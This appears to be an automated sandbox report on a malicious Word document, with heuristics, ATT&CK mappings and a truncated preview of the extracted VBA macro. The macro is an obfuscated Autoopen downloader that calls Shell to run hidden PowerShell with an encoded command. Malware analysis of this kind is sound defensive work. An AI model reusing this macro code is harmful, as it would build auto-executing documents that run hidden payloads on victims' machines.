Verdict: MALICIOUS (Risk Score: 182)

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1059 Command and Scripting Interpreter
- T1204.002 Malicious File
The sample is a Microsoft Office document containing a VBA macro with an Autoopen subroutine. The macro calls the Shell() function, which is a critical indicator of malicious activity. The script attempts to construct a PowerShell command, suggesting it is designed to download and execute a secondary payload. The obfuscation of the script and the absence of a clear URL prevent higher-confidence family attribution.
Heuristics (6)
- VBA macros detected (medium; OLE_VBA_MACROS; 3 related findings): Document contains VBA macro code.
- Shell() call in VBA (critical; OLE_VBA_SHELL): Shell() call in VBA.
- AutoOpen macro (high; OLE_VBA_AUTOOPEN): AutoOpen macro.
- VBA p-code auto-exec with execution tokens (high; OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium; OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info; EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body).
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 18331 bytes |

SHA-256: c46bdd87e0a1f9f2fe814d728acb5a07e60e4dbe178afe807e1fa0f384936dfa
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "vJviKlDZFUtz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function lwOFdS()
On Error Resume Next
Select Case KAlJpaMw
Case 98328
MZlNaG = 99216
nBiYn = CDbl(88851)
Case 50042
fdEHMc = QWTHA
pMawb = 82019
End Select
Select Case KAlIBXso
Case 91624
tLBOaj = 9702
jsrRjI = CDbl(41369)
Case 82641
zwzwp = bLDHc
FMTRvX = 8225
End Select
lwOFdS = fhDVRKK + Shell(bOsdZNE + Chr(vbKeyP) + QCoGdOzzaY + zGiZEDwMvkJ + VjkPltwaKFs + RNjSLiGH + FGIwi + vUcnjKZ + pDwOpPv + wHiKzIiFI + kXjjpV, SVWzPjmXlB + vbHide + YlGDzARDci)
Select Case KAlEhRUt
Case 55320
FJGKmK = 31839
pwiDEZ = CDbl(6416)
Case 43630
cRdfXA = kRWCSh
EMZWBw = 93817
End Select
End Function
Sub Autoopen()
On Error Resume Next
Select Case KAlToUiTN
Case 37534
uBKor = 55191
ChJSZV = CDbl(77364)
Case 26781
HUdri = Baflw
LthaRQ = 53526
End Select
lwOFdS
Select Case KAlItlbN
Case 44091
sdXUia = 88753
wkcVr = CDbl(99239)
Case 69835
FiJro = sIEMMR
jBdHO = 17437
End Select
End Sub
Attribute VB_Name = "IQTNRWjqpvkBXk"
Function QCoGdOzzaY()
On Error Resume Next
Select Case KAlJnjacX
Case 29697
SKwdFE = 34903
IjKpLl = CDbl(45103)
Case 71654
sUsRjM = JVoCjL
hczcNp = 25895
End Select
qRcIjV = "owersHeLL " + "-WinDowsTyle h" + "idden -e LgA" + "oACAAJABlAG4Adg"
Select Case KAlvGbCR
Case 51939
kXPvt = 68048
XdizW = CDbl(40150)
Case 68886
PNzrd = LJKvT
ZlpjvB = 8484
End Select
ZzuNazcTJ = "A6AEMAbw" + "BtAHMAcABl" + "AEMAWwA0ACwAM" + "gA0ACwAMgA1AF" + "0ALQBqAE8AS" + "QBuAC"
Select Case KAlRmlRIi
Case 11216
tPTsQ = 60635
NFZzrY = CDbl(26793)
Case 11270
ZrdlnC = UQwwc
fiwHpQ = 89736
End Select
VIohrw = "cAJwApACAAK" + "AAoACcAbgA" + "1AFYA" + "bgBzAGE" + "AJwArACcAZABh" + "AHMAZA" + "AgACcAKwAnAD0"
Select Case KAlbbtuca
Case 42586
MMDjm = 84747
AUiqN = CDbl(96849)
Case 54078
hOlZq = kjzLWw
jrLbf = 33491
End Select
dkWZzlDYA = "AIAAm" + "ACcAKwAn" + "ACgAbgA0" + "AGgAbg" + "AnACsAJwBuADQ" + "AaAAnACsAJwArAC" + "cAKwAnAG4A" + "JwArACcANABoAGU"
Select Case KAlmvwpn
Case 33474
mHZhiw = 17968
fqBfD = CDbl(53512)
Case 55595
VPtBR = WPhjYf
SwmZCz = 53704
End Select
SPHjAXwwFl = "AbgA0AGgAKwAn" + "ACsAJwBuADQAaAB" + "3AC0Abw" + "BiACcAKwA" + "nAGoAJwArACc" + "AZQBjACcAKw" + "AnAG4ANABo"
Select Case KAlirzGX
Case 22772
aANcJ = 79192
ZuPjKk = CDbl(19723)
Case 99115
adaNuO = BdAir
tvuQB = 78568
End Select
VInbpXlcCwO = "ACsAJwArAC" + "cAbgA0AGgAdA" + "BuADQAJ" + "wArACcAaAApACAA" + "cgAnACsA" + "JwBhACcAKwAnAG4" + "AZABvAG0AOwBuAD"
Select Case KAlTwWwrW
Case 84696
VnrNi = 89315
cwwbL = CDbl(90386)
Case 23324
IHjBAU = tjVSii
dWXWv = 60691
End Select
NZuIBTVC = "UAVgBZAFkAV" + "QAnAC" + "sAJwAgAD0AIA" + "AuACgAbgA0AGg" + "AbgAnACsAJw" + "BlAG4ANABoA" + "CcAKwAnACsA"
Select Case KAlJUNdUS
Case 95764
ZdlHw = 25986
IVrpju = CDbl(14972)
Case 84843
QuVSc = pzjHw
WXjBoa = 18196
End Select
qafwcrLZcid = "bgA0ACcAKwA" + "nAGgAJwArACcAd" + "wAnACs" + "AJwBuADQ" + "AJwArACc" + "AaAArAG4ANA" + "AnACs" + "AJwBoAC0Abw" + "BiAGoAJwArA" + "CcAZQBjAHQAJw"
Select Case KAljXjuoN
Case 3975
GvvBcB = 25701
zfqVo = CDbl(74730)
Case 51150
ODmzLn = TwzftO
iOBJsk = 23062
End Select
BkNQTs = "ArACcAbgA0AGgAK" + "Q
... (truncated)